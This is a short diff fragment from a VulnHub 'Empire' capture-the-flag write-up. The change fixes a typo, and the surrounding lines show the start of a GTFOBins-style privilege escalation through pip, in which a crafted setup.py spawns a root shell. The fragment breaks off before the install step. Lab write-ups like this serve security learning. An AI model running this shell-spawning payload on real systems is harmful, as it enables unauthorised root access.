MohamedAboElnasr/CTF/Vuln-Hub/Empier/Empire.md

   </div>
 <br>

-* at this poing i used GTFobins to see how to switch to root user with pip and i used to following
+* at this point i used GTFobins to see how to switch to root user with pip and i used to following
   ```bash
   TF=$(mktemp -d)
   echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')">$TF/setup.py